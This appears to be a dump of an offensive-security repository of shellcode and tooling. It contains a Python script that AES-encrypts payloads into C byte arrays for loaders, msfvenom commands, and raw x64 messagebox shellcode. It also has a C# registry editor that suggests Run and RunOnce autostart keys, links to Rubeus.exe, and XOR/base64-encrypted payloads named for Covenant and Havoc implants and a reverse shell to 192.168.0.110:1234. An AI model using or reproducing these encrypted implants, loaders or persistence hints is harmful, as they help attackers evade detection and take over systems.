hashlib.sha256(key).digest() 20 | iv = 16 * '\x00' 21 | plaintext = pad(plaintext) 22 | cipher = AES.new(k, AES.MODE_CBC, iv) 23 | 24 | return cipher.encrypt(bytes(plaintext)) 25 | 26 | 27 | try: 28 | plaintext = open(sys.argv[1], "rb").read() 29 | except: 30 | print("File argument needed! %s " % sys.argv[0]) 31 | sys.exit() 32 | 33 | ciphertext = aesenc(plaintext, KEY) 34 | print('AESkey[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in KEY) + ' };') 35 | print('payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 36 | -------------------------------------------------------------------------------- /dotNETbinaries/AES_encrypted/mssgbox_shellcode_x64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/AES_encrypted/mssgbox_shellcode_x64.bin -------------------------------------------------------------------------------- /dotNETbinaries/HelloReflectionWorld.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/HelloReflectionWorld.exe -------------------------------------------------------------------------------- /dotNETbinaries/README.md: -------------------------------------------------------------------------------- 1 | 1. 2 | ``` 3 | $ msfvenom --platform windows -a x86 -p windows/messagebox Text="Hello from shellcode" -f csharp > mssgbox_csharp_shellcode_x86.txt 4 | ``` 5 | [mssgbox_csharp_shellcode_x86.txt](https://github.com/reveng007/Executable_Files/blob/main/dotNETbinaries/mssgbox_csharp_shellcode_x86.txt) 6 | 7 | 2. 8 | ``` 9 | $ msfvenom --platform windows -a x64 -p windows/x64/messagebox Text="Hello from shellcode" -f csharp > mssgbox_csharp_shellcode_x64.txt 10 | ``` 11 | [mssgbox_csharp_shellcode_x64.txt](https://github.com/reveng007/Executable_Files/blob/main/dotNETbinaries/mssgbox_csharp_shellcode_x64.txt) 12 | 13 | 3. 14 | Creation of bin file: 15 | ``` 16 | $ echo -ne "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\xfe\x00\x00\x00\x3e\x4c\x8d\x85\x13\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff\xd5\x48\x65\x6c\x6c\x6f\x20\x66\x72\x6f\x6d\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x00\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00" > mssgbox_shellcode_x64.bin 17 | ``` 18 | > -n do not output the trailing newline 19 | > -e enable interpretation of backslash escapes, specifically recognises “\xHH” as hexadecimal. 20 | 21 | source link: https://ivanitlearning.wordpress.com/2018/10/14/shellcoding-with-msfvenom/ 22 | 23 | -------------------------------------------------------------------------------- /dotNETbinaries/RegistryTinker.cs: -------------------------------------------------------------------------------- 1 | using System; // 2 | using System.Text; // Namespace which contain Class named, "StringBuilder" which represents a mutable string of characters 3 | using Microsoft.Win32; // Namespace which contain Class named, "Registry" which Provides RegistryKey objects that represent the root keys in the Windows registry, and static methods to access key/value pairs. 4 | using System.Collections.Generic; // Namespace which contain Class named, "Dictionary" which represents a collection of keys and values. 5 | 6 | namespace RegistryTinker 7 | { 8 | public class program 9 | { 10 | 11 | // links: 12 | // https://www.c-sharpcorner.com/UploadFile/rohatash/difference-between-object-and-dynamic-keyword-in-C-Sharp/ 13 | // https://www.dotnettricks.com/learn/csharp/differences-between-object-var-and-dynamic-type 14 | 15 | // Creating a dictionary to store all the registry bases or registry hives 16 | public static Dictionary registryHives = new Dictionary(); 17 | 18 | // Object list Under Registry: 19 | // https://docs.microsoft.com/en-us/dotnet/api/microsoft.win32.registry?view=net-6.0#remarks 20 | 21 | 22 | // ============================ All Command Menus ====================================== 23 | 24 | public static void FirstCmdMenu() 25 | { 26 | Console.WriteLine(@"[*] Use: 27 | 1. readkey: To read any reg key 28 | 2. createkey: To create any reg key 29 | 3. deletekey: To delete any reg key 30 | 4. setvalue: To set any value to a specific reg key 31 | 5. deletevalue: To delete any previously set value of a specific reg key 32 | 6. exit: To exit"); 33 | } 34 | 35 | public static void SecondCmdMenu() 36 | { 37 | Console.WriteLine("Give a key in the following formats:"); 38 | Console.WriteLine("====================================\n"); 39 | Console.WriteLine("RegistryKeyHiveName\\KEY\\SUBKEY\\...\\SUBKEY: \n"); 40 | Console.WriteLine("\n[*] SOME HINTS:\n"); 41 | Console.WriteLine("[1] HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run \tAdd the reg keys, to automatically run software whenever user logs in. \n\t\t\t\t\t\t\t\t\tWhere, HKEY_CURRENT_USER: Its subkeys contain user profiles for all users that ever logged in locally to this machine."); 42 | Console.WriteLine("[2] HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run \tAdd the reg keys, to automatically run software whenever system reboots. \n\t\t\t\t\t\t\t\t\tWhere, HKEY_LOCAL_MACHINE: Contains machine wide configuration information including hardware and software settings"); 43 | Console.WriteLine("[3] HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall \tTo uninstall added reg keys, to disable automatic running of it while system reboot."); 44 | Console.WriteLine("[4] HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce \tAdd the reg keys, to automatically run software whenever user logs in, the program run \n\t\t\t\t\t\t\t\t\t one time, and then the key is deleted. \n\t\t\t\t\t\t\t\t\tWhere, HKEY_LOCAL_MACHINE: Configuration information including hardware and software settings."); 45 | Console.WriteLine("[5] HKEY_CURRENT_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce \tAdd the reg keys, to automatically run software whenever system reboots, the program \n\t\t\t\t\t\t\t\t\t run one time, and then the key is deleted. \n\t\t\t\t\t\t\t\t\tWhere, HKEY_CURRENT_USER: profile of the currently logged-on user."); 46 | } 47 | 48 | // ============================== Getting reg key input from User ============================= 49 | // ======================================= Console No. 2 ====================================== 50 | 51 | public static string GetRegKeyInput(string cmd) 52 | { 53 | string key; 54 | 55 | Console.WriteLine("\n[*] Registry key to {0}?\n", cmd); 56 | Console.WriteLine(@"[+] [TIPS: 57 | 1. Press any key to move back to previous Console Prompt 58 | 2. ""exit"": To exit]"); 59 | 60 | Console.Write("\n[KeyName>] "); 61 | key = Console.ReadLine(); 62 | 63 | return key; 64 | } 65 | 66 | // ============================ Convertion of String type (hivename) to RegistryKey type (hivename) =================== 67 | 68 | public static RegistryKey ConvertStringToRegistryKey(string hivename) 69 | { 70 | RegistryKey rkey; 71 | 72 | if(hivename == "HKEY_CURRENT_USER") 73 | { 74 | rkey = Registry.CurrentUser; 75 | return rkey; 76 | } 77 | else if(hivename == "HKEY_CLASSES_USER") 78 | { 79 | rkey = Registry.ClassesRoot; 80 | return rkey; 81 | } 82 | else if(hivename == "HKEY_CURRENT_CONFIG") 83 | { 84 | rkey = Registry.CurrentConfig; 85 | return rkey; 86 | } 87 | else if(hivename == "HKEY_LOCAL_MACHINE") 88 | { 89 | rkey = Registry.LocalMachine; 90 | return rkey; 91 | } 92 | else 93 | { 94 | rkey = Registry.Users; 95 | return rkey; 96 | } 97 | } 98 | 99 | 100 | // ===================================== Interacting with REGISTRY KEYS with various goals in mind ================================== 101 | 102 | // ====== Exit function ============== 103 | 104 | public static void EXIT(string cmd) 105 | { 106 | if (cmd.Equals("exit")) 107 | { 108 | // exiting 109 | System.Environment.Exit(1); 110 | } 111 | } 112 | 113 | // Seperate funtion for parsing hive/base name and Key name 114 | public static string[] ParsingRegKeyPath(string cmd) 115 | { 116 | // We would return 2 strings: hivename and keyname 117 | string[] ret = new string[2]; 118 | 119 | // hivename: Storing the registry hive name from Reg key path inputed i.e. cmd 120 | ret[0] = cmd.Split('\\')[0]; 121 | 122 | EXIT(cmd); 123 | 124 | if(!registryHives.ContainsKey(ret[0])) 125 | { 126 | Console.WriteLine("\n[-] Registry base/hive name is not found."); 127 | Console.WriteLine("[*] Moving to previous shell...\n"); 128 | MainConsole(); 129 | } 130 | 131 | // keyname: Storing the registry key name from the whole Reg key path inputed i.e. cmd 132 | ret[1] = cmd.Substring(ret[0].Length+1, cmd.Length-ret[0].Length-1); 133 | 134 | return ret; 135 | } 136 | 137 | // ============================== Getting reg key to read ============================= 138 | 139 | public static void ReadRegKey(string cmd) 140 | { 141 | // Storing 2 strings: hivename and keyname 142 | string[] hivename_keyname = ParsingRegKeyPath(cmd); 143 | 144 | // Printing reg hive name 145 | Console.WriteLine("\n[+] Registry base/hive name :\t {0}\n", hivename_keyname[0]); 146 | 147 | // As, converting of String type to RegistryKey type is not possible 148 | // => link: https://www.dotnetspider.com/forum/17404-Urgent-How-to-convert-e-string-to-RegistryKey 149 | // So, Creating custom function to do the Convertion 150 | // Calling function named, ConvertStringToRegistryKey() 151 | RegistryKey rkey = ConvertStringToRegistryKey(hivename_keyname[0]); 152 | 153 | // Retrieve all the subkeys for the specified key. 154 | string [] subkeynames = rkey.GetSubKeyNames(); 155 | 156 | int count1 = 1; 157 | 158 | //Print the Subkeynames Under Current Registry Hive name 159 | Console.WriteLine(@" [1] Registry SubKeys available Under ""{0}""",registryHives[hivename_keyname[0]]); 160 | Console.WriteLine(" ========================================================\n"); 161 | 162 | // Print the contents of the array to the console, i.e, All subkeys under requested Registry Hive 163 | foreach (string s in subkeynames) 164 | { 165 | Console.WriteLine("\t [{0}] {1}",count1,s); 166 | count1++; 167 | } 168 | 169 | using(RegistryKey key = registryHives[hivename_keyname[0]].OpenSubKey(hivename_keyname[1])) // Reading the keys 170 | { 171 | // Printing the registry key name 172 | Console.WriteLine("\n[+] Requested Registry Key/key name :\t {0}\n",hivename_keyname[1]); 173 | 174 | //Print the Value Names and Values 175 | int count2 = 1; 176 | Console.WriteLine(" [1] ValueName : Value"); 177 | Console.WriteLine(" ========================\n"); 178 | 179 | try 180 | { 181 | foreach(string valuename in key.GetValueNames()) // Printing the Values 182 | { 183 | Object obj = key.GetValue(valuename); 184 | 185 | if(obj == null) 186 | { 187 | Console.WriteLine("[-] Returned object was empty"); 188 | } 189 | 190 | /* 191 | // Have to do something so that System.Byte[] object type gets printed on the Console 192 | 193 | // Getting Object types 194 | Console.WriteLine("Type: {0}",obj.GetType()); 195 | 196 | if (obj.GetType().Equals("System.Byte[]")) 197 | { 198 | 199 | Console.WriteLine(Encoding.Default.GetString(obj)); 200 | Console.WriteLine("\t [{0}] {1} : {2}", count2,valuename,obj); 201 | break; 202 | } 203 | */ 204 | Console.WriteLine("\t [{0}] {1} : {2}", count2,valuename,obj); 205 | count2++; 206 | } 207 | } 208 | catch(System.NullReferenceException e) 209 | { 210 | Console.WriteLine("[-] KeyName in the provided Registry Key path is absent: {0}\t Try Again!!", e.Message); 211 | } 212 | } 213 | // mimicking the Swtich Case scenario of Main() function to enable the smooth flow of [KeyName>] prompt 214 | string mimic_main_key = GetRegKeyInput("read"); 215 | ReadRegKey(mimic_main_key); 216 | } 217 | 218 | 219 | // ============================== Creating registry Sub keys to add to registry hive ============================= 220 | 221 | public static void CreateRegKey(string cmd) 222 | { 223 | // Storing 2 strings: hivename and keyname 224 | string[] hivename_keyname = ParsingRegKeyPath(cmd); 225 | 226 | // Printing reg hive name 227 | Console.WriteLine("\n[+] Registry base/hive name :\t {0}", hivename_keyname[0]); 228 | 229 | // Printing the registry key name 230 | Console.WriteLine("[+] Requested Registry Key/key name :\t {0}\n",hivename_keyname[1]); 231 | 232 | using(RegistryKey KEY = registryHives[hivename_keyname[0]].OpenSubKey(hivename_keyname[1])) // Reading the keys 233 | { 234 | try 235 | { 236 | if (KEY == null) 237 | { 238 | Console.WriteLine("\n[+] Similar KeyName in the provided Registry Key path doesn't exist previously"); 239 | 240 | // Creating registry Sub keys to add 241 | RegistryKey key = registryHives[hivename_keyname[0]].CreateSubKey(hivename_keyname[1]); 242 | Console.WriteLine("[+] Registry Sub Key Created!!\n"); 243 | } 244 | else 245 | { 246 | Console.WriteLine("\n[-] Similar KeyName in the provided Registry Key path already exists:\t Try Again!!"); 247 | } 248 | } 249 | catch (Exception e) 250 | { 251 | Console.WriteLine("[-] Unable to Create Registry Sub Key: {0}", e.Message); 252 | } 253 | } 254 | // mimicking the Swtich Case scenario of Main() function to enable the smooth flow of [KeyName>] prompt 255 | string mimic_main_key = GetRegKeyInput("create"); 256 | CreateRegKey(mimic_main_key); 257 | } 258 | 259 | 260 | // ============================== Deleting registry Sub keys from registry hive ============================= 261 | 262 | public static void DeleteRegKey(string cmd) 263 | { 264 | // Storing 2 strings: hivename and keyname 265 | string[] hivename_keyname = ParsingRegKeyPath(cmd); 266 | 267 | // Printing reg hive name 268 | Console.WriteLine("\n[+] Registry base/hive name :\t {0}", hivename_keyname[0]); 269 | 270 | // Printing the registry key name 271 | Console.WriteLine("[+] Requested Registry Key/key name :\t {0}\n",hivename_keyname[1]); 272 | 273 | using(RegistryKey KEY = registryHives[hivename_keyname[0]].OpenSubKey(hivename_keyname[1])) // Reading the keys 274 | { 275 | try 276 | { 277 | if (KEY == null) 278 | { 279 | Console.WriteLine("\n[-] KeyName in the provided Registry Key path doesn't exist:\t Try Again!!"); 280 | } 281 | else 282 | { 283 | Console.WriteLine("\n[+] KeyName in the provided Registry Key path exists\n"); 284 | 285 | // Deleting registry Sub key 286 | registryHives[hivename_keyname[0]].DeleteSubKey(hivename_keyname[1]); 287 | registryHives[hivename_keyname[0]].Close(); 288 | 289 | Console.WriteLine("[+] Registry Sub Key Deleted!!\n"); 290 | } 291 | } 292 | catch (Exception e) 293 | { 294 | Console.WriteLine("[-] Unable to Delete Registry Sub Key: {0}", e.Message); 295 | } 296 | } 297 | // mimicking the Swtich Case scenario of Main() function to enable the smooth flow of [KeyName>] prompt 298 | string mimic_main_key = GetRegKeyInput("delete"); 299 | DeleteRegKey(mimic_main_key); 300 | } 301 | 302 | 303 | // ============================== Setting value to a registry Subkey ========================= 304 | public static void SetValue(string cmd) 305 | { 306 | // Storing 2 strings: hivename and keyname 307 | string[] hivename_keyname = ParsingRegKeyPath(cmd); 308 | 309 | // Printing reg hive name 310 | Console.WriteLine("\n[+] Registry base/hive name :\t {0}", hivename_keyname[0]); 311 | 312 | // Printing the registry key name 313 | Console.WriteLine("[+] Requested Registry Key/key name :\t {0}\n",hivename_keyname[1]); 314 | 315 | using(RegistryKey KEY = registryHives[hivename_keyname[0]].OpenSubKey(hivename_keyname[1],true)) // Reading the keys and true makes it writable 316 | { 317 | try 318 | { 319 | if (KEY == null) 320 | { 321 | Console.WriteLine("\n[-] KeyName in the provided Registry Key path doesn't exist:\t Try Again!!"); 322 | } 323 | else 324 | { 325 | Console.WriteLine("\n[+] KeyName in the provided Registry Key path exists\n"); 326 | 327 | //Entering value name 328 | Console.WriteLine("[*] Registry Value Name?"); 329 | Console.Write("[valuename>] "); 330 | string valuename = Console.ReadLine(); 331 | 332 | EXIT(valuename); 333 | 334 | //Entering value 335 | Console.WriteLine("\n[*] Registry Value?"); 336 | Console.Write("[value>] "); 337 | string Value = Console.ReadLine(); 338 | 339 | EXIT(Value); 340 | 341 | //Adding valuename and value, to registry Sub key 342 | /* 343 | * We could have also used this: 344 | * 345 | * link: https://docs.microsoft.com/en-us/dotnet/api/microsoft.win32.registry.setvalue?view=net-6.0 346 | * Syntax: 347 | * public static void SetValue (string keyName, 348 | * string? valueName, 349 | * object value, 350 | * Microsoft.Win32.RegistryValueKind valueKind); 351 | 352 | * Sets the specified name/value pair on the specified registry key. If the specified key does not exist, it is created. 353 | * As, Already the not existing registry key is discarded using try catch previously, we can use this... This will not create accidental Registry Key. 354 | 355 | * Registry.SetValue(cmd,valuename,Value,RegistryValueKind.String); 356 | */ 357 | KEY.SetValue(valuename,Value); 358 | 359 | Console.WriteLine("\n[+] Registry Value added!!\n"); 360 | } 361 | } 362 | catch (Exception e) 363 | { 364 | Console.WriteLine("[-] Unable to Add Registry Value: {0}", e.Message); 365 | } 366 | } 367 | // mimicking the Swtich Case scenario of Main() function to enable the smooth flow of [KeyName>] prompt 368 | string mimic_main_key = GetRegKeyInput("set value"); 369 | SetValue(mimic_main_key); 370 | } 371 | 372 | // ============================== Deleting value from a registry Subkey ========================= 373 | public static void DeleteValue(string cmd) 374 | { 375 | // Storing 2 strings: hivename and keyname 376 | string[] hivename_keyname = ParsingRegKeyPath(cmd); 377 | 378 | // Printing reg hive name 379 | Console.WriteLine("\n[+] Registry base/hive name :\t {0}", hivename_keyname[0]); 380 | 381 | // Printing the registry key name 382 | Console.WriteLine("[+] Requested Registry Key/key name :\t {0}\n",hivename_keyname[1]); 383 | 384 | using(RegistryKey KEY = registryHives[hivename_keyname[0]].OpenSubKey(hivename_keyname[1],true)) // Reading the keys and true makes it writable 385 | { 386 | try 387 | { 388 | if (KEY == null) 389 | { 390 | Console.WriteLine("\n[-] KeyName in the provided Registry Key path doesn't exist:\t Try Again!!"); 391 | } 392 | else 393 | { 394 | Console.WriteLine("\n[+] KeyName in the provided Registry Key path exists\n"); 395 | 396 | //Entering value name 397 | Console.WriteLine("[*] Registry Value Name?"); 398 | Console.Write("[valuename>] "); 399 | string valuename = Console.ReadLine(); 400 | 401 | EXIT(valuename); 402 | 403 | KEY.DeleteValue(valuename); 404 | 405 | Console.WriteLine("\n[+] Registry Value deleted!!\n"); 406 | } 407 | } 408 | catch (Exception e) 409 | { 410 | Console.WriteLine("[-] Unable to Delete Registry Value: {0}", e.Message); 411 | } 412 | } 413 | // mimicking the Swtich Case scenario of Main() function to enable the smooth flow of [KeyName>] prompt 414 | string mimic_main_key = GetRegKeyInput("delete value"); 415 | DeleteValue(mimic_main_key); 416 | } 417 | 418 | // ===================================== Main Console ======================================== 419 | 420 | public static void MainConsole() 421 | { 422 | while(true) 423 | { 424 | FirstCmdMenu(); 425 | // Starting Menu: 426 | Console.Write("\n[>] "); 427 | string userinput = Console.ReadLine(); 428 | if (userinput == null || userinput.Equals("")) 429 | { 430 | Console.WriteLine("[-] User input is out of Command Menu Syllabus\n"); 431 | continue; 432 | } 433 | 434 | EXIT(userinput); 435 | 436 | string key; 437 | 438 | switch(userinput) 439 | { 440 | case "readkey": 441 | 442 | SecondCmdMenu(); 443 | 444 | // Get reg key from the user 445 | key = GetRegKeyInput("read"); 446 | 447 | // Calling read reg key 448 | ReadRegKey(key); 449 | break; 450 | 451 | case "createkey": 452 | 453 | SecondCmdMenu(); 454 | 455 | // Get reg key from the user 456 | key = GetRegKeyInput("create"); 457 | 458 | // Calling read reg key 459 | CreateRegKey(key); 460 | break; 461 | 462 | case "deletekey": 463 | 464 | SecondCmdMenu(); 465 | 466 | // Get reg key from the user 467 | key = GetRegKeyInput("delete"); 468 | 469 | // Calling read reg key 470 | DeleteRegKey(key); 471 | break; 472 | 473 | case "setvalue": 474 | 475 | SecondCmdMenu(); 476 | 477 | // Get reg key from the user 478 | key = GetRegKeyInput("set value"); 479 | 480 | // Calling read reg key 481 | SetValue(key); 482 | break; 483 | 484 | case "deletevalue": 485 | 486 | SecondCmdMenu(); 487 | 488 | // Get reg key from the user 489 | key = GetRegKeyInput("delete value"); 490 | 491 | // Calling read reg key 492 | DeleteValue(key); 493 | break; 494 | 495 | default: 496 | break; 497 | } 498 | } 499 | } 500 | 501 | // ====================================== Entry Funtion ============================ 502 | 503 | public static void Main() 504 | { 505 | // Building a dictionary for all registry hive names 506 | // so that we can parse the request and ask 507 | // them seperately. 508 | 509 | registryHives.Add("HKEY_CURRENT_USER", Registry.CurrentUser); 510 | registryHives.Add("HKEY_CLASSES_USER", Registry.ClassesRoot); 511 | registryHives.Add("HKEY_CURRENT_CONFIG", Registry.CurrentConfig); 512 | registryHives.Add("HKEY_LOCAL_MACHINE", Registry.LocalMachine); 513 | registryHives.Add("HKEY_USERS", Registry.Users); 514 | 515 | MainConsole(); 516 | } 517 | } 518 | } 519 | -------------------------------------------------------------------------------- /dotNETbinaries/RegistryTinker.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/RegistryTinker.exe -------------------------------------------------------------------------------- /dotNETbinaries/Rubeus.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/Rubeus.exe -------------------------------------------------------------------------------- /dotNETbinaries/XOR_b64_encrypted/covenant.txt: -------------------------------------------------------------------------------- 1 | jo35ZW5nUAHl+4AS7jxXu2I7+TdiatktFgHI+RdeVK7LDFFLcElWpKFqMfd+B4ok7jx3u3ILc7X9JRbi8GdDPmSm7iZ/u2gXc7Ym4KcTDAHIO+5C7m+xAfD2vWjaZKlf0EXDcRiOXhNDRdBv+T1SZL0Buzx8+T1qZL3sNLs2ouwyQUo8a1FuKDSJhTY4arslm+WJmpE6WAMFcmUeEh1Vb2RfPhJQYuePz+CP4mR2ZUejZGBfW+UdZZGyWjpfp4btFgZlMDTl+4MmNT43cGB3Ig2carGHz+WgGHUgMgb+lURWjbDzpRptz34/B4meAm5nMFo3GGEgMgZl6fhojbD1nW4ZBrsBGCUeZX5nMGZdcg0uwT2Cz+WkIQ92Mz0wWDLuujqJsO2fME0fKg12JW5nWjBnGm5Zal6Y5WdfBws7BJGybm7IfkF54B6Yz8/e6ZqJmm+kGfZCs6bNhXNNOliR59jrmrtbNkw98p6WEGvcdyNFHQ92NpGy 2 | -------------------------------------------------------------------------------- /dotNETbinaries/XOR_b64_encrypted/covenant2.txt: -------------------------------------------------------------------------------- 1 | jo35ZW5nULnSQ7cS7jxXu2I7+Tdi7hxPAc84xS9QVK7LDFFLcElWpKFqMfd+B4ok7jx3Z7t1TmSm7i4ftfBDPmSmNeU/EDHk+S1u4KcTDHm8Ru53s1+YAfCbs6p7ZKlf0EXDcRiOXhNDRdBv+T1SZL0Buzx8+T1qZL3sNLs2ouwyQUo8a1FuKDSJhTY4arslm+WJmpE6WAMFcmUeEh1Vb2RfPhJQYuePz+CP4mR2ZUejZGBfW+UdZZGyWjpfp4btFgZlMDTl+4MmNT43cGB3Ig2carGHz+WgGHUgMgb+lURWjbDzpRptz34/B4meAm5nMFo3GGEgMgZl6fhojbD1nW4ZBrsBGCUeZX5nMGZdcg0uwT2Cz+WkIQ92Mz0wWDLuujqJsO2fME0fKg12JW5nWjBnGm5Zal6Y5WdfBws7BJGybm7IfkF54B6Yz8/e6ZqJmm+kGfZCs6bNldvFZlo3IZqj 2 | -------------------------------------------------------------------------------- /dotNETbinaries/XOR_b64_encrypted/havoc.txt: -------------------------------------------------------------------------------- 1 |  2 | -------------------------------------------------------------------------------- /dotNETbinaries/XOR_b64_encrypted/mssg_shellcode_exitfunc_thread_x64.txt: -------------------------------------------------------------------------------- 1 | 6pRXcDXqyMn+n0nmMCkGte5iAAq3jcTOX/5aTlfywtvfFFi4Hs4ZsVpUd4GuQreMBWktQ7XLjGi6MqgtT7XHC4//W7PicUBA8L/ss5DOb0AsIzVaHCEF2VP023TRdDQq3MnvXjWJbFGl+2Yxlat/FyU2T0wTzf+CgDl9lhuxE0caOOWcGqfhLc2/acJwFDHYDu0zpzXuZrpG1mo7Bz8qToWajglyH6mIpskCyVNM6P9ZHmrXC9cSTxuUedvnKi8mTd0nmny3Joxqbh5OrNY/x3D13iO7tZOTCfrpk5ur67v26tjb4M/ZgDNI6twnFeGh9BbgrYA4eFeP/TeQwxV4A4zLfw1sCj+vBpOWGZx1yWur78BoQXFgCwcUUMrL2S2PCf2MftV66incee6cq5jXrtXgB7Q8/YWC+w+wf46scfit7qvgGBHJvF7Ht+z/irxV 2 | -------------------------------------------------------------------------------- /dotNETbinaries/XOR_b64_encrypted/mssg_shellcode_x64.txt: -------------------------------------------------------------------------------- 1 | XJVVlunSWzMwIZQ1vvgRRHVPIowGoXwRO15ALAjtqEi4tEvLZvgqIpUjYbSUr6K3U49iwPzesIlErb04KyrHbR+GUyy8h101bX4jcBfVEKwtgvRdvYj7N9QTY/KxOM22CFlKKU9/p/oEVQqY/EKUTjyITLhQdWsVxLpU36jIBGd+X3nx7/9FQIagsDQsrvt4CTZN5ghmTM4U2Xq9Nt0cDrNAjmDgj6MoN7S9SIbnr9q7b+IvgHc5eUG7d6MVdolqF/98sSufMFsZjMmTNSesGTT9tqW/lxTAxIgf2pUQCZ1Ub1aSb0Xnh1lkVUEHRbd/fiMrsdVa2p2bRWaU78RCaKOwPsNfkXnxwuSlXaEe9N+i1+YddgKIbBofVk6dlVO2bNtcXsQIQB6zJspOPFb1HA== 2 | -------------------------------------------------------------------------------- /dotNETbinaries/XOR_b64_encrypted/mssgbox_RTO.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/XOR_b64_encrypted/mssgbox_RTO.bin -------------------------------------------------------------------------------- /dotNETbinaries/XOR_b64_encrypted/mssgbox_RTO.txt: -------------------------------------------------------------------------------- 1 | ji33gZ6Yz8/fomV2ZS82cWBlIzM+VLwCeLtlEls+7jx/Dni8IEVILeUVYA5/fdI8LyNW+XgGsslKBBJlHBB2s6x7JG+m0t1lMzRILeU1EA68MFk+ZL5Zu7C/cmV2LeunRF9/c7UmW+UvKA5z+SVWLG+302x/jaxIJOVTuHg2pChHrCZW8Jx2s6x7JG+mCNBCg1s6ZiJDOHUOoxCgPVAju3ATO2SmA1Amuzx/TCH9JXIuMeAJM+5y7SZm4HFvMz0oPDQmaHFuMz8+5oJHcWLIkj03PDRZeLslmyyJmpE6eff2cmV2ZVAvvaXJcmV2WyLqtSM2cmU+VKcminW0JGKJsCZW+XGNgtDUM5GyeFVbHgpWAxwIXRBEGgAaCQ0IVFU3PwAFFg8AVXJYCmU= 2 | -------------------------------------------------------------------------------- /dotNETbinaries/XOR_b64_encrypted/mssgbox_shellcode_exitfunc_thread_x64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/XOR_b64_encrypted/mssgbox_shellcode_exitfunc_thread_x64.bin -------------------------------------------------------------------------------- /dotNETbinaries/XOR_b64_encrypted/mssgbox_shellcode_x64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/reveng007/Executable_Files/d74f4db748d6af18c84f62f62050d29f1d9e1978/dotNETbinaries/XOR_b64_encrypted/mssgbox_shellcode_x64.bin -------------------------------------------------------------------------------- /dotNETbinaries/XOR_b64_encrypted/rev_kali_192_168_0_110_1234.txt: -------------------------------------------------------------------------------- 1 | ji31gZ6P8DA3ciQnJD41YWZ/Q7cTLeU1UHi8IH0+7jxHeLtFIi150iQtfQH+OlS2yVIGTDIbUiS3rGMmMfHVnzc3NCbsYhC8MFk+ZL7ssLg3cmU+4K4TV3g2ojX9LXYju3AXO2Smhjgvz/l2+VH+LW+xfQH+OlS2yS+m+T12c6ROhRuWfDN7Vm0zXL8S6Ghz+SVSLG+3VnG8fi0y7i57eTHnM+5y7SZm4HFvMz0oPDQmaHFuMz8+5oJHcWLIkj03PDQvuyLeJZqJmjMujkdEQDpFV25ncWZ++4M+5ILHMTA3O+yTLNJlMDTlss12Cy8zebnTPuyHJNQrRxYwjbA67IQPMTE3cjw330fnWzDIpzUmKF+ufQH3Opq2LeeleM/3Ouy3JNSNP+/XjbA+7KkNIHFvPuyULeeecYqu1xEXmrsvsfR3cGV2LNYEXVQ3cmV2ZS83cWB/+4chMjkqAfBdfzw3NYybVvdzVjF3ZCbqdBQvtGUeLeeBZmB2IiQmJD4uz/B2IiyJrSPu8Xy+syTMHKJYts/iOlSkLZGtuz52yG3xeA6Y5YvXb098JNTBpY2qjbA+5qpPDDZLeOWNhRtii3ckAAocZTcmuerIpw== 2 | -------------------------------------------------------------------------------- /dotNETbinaries/XOR_b64_encrypted/rev_kali_192_168_0_110_1234_https.txt: -------------------------------------------------------------------------------- 1 | 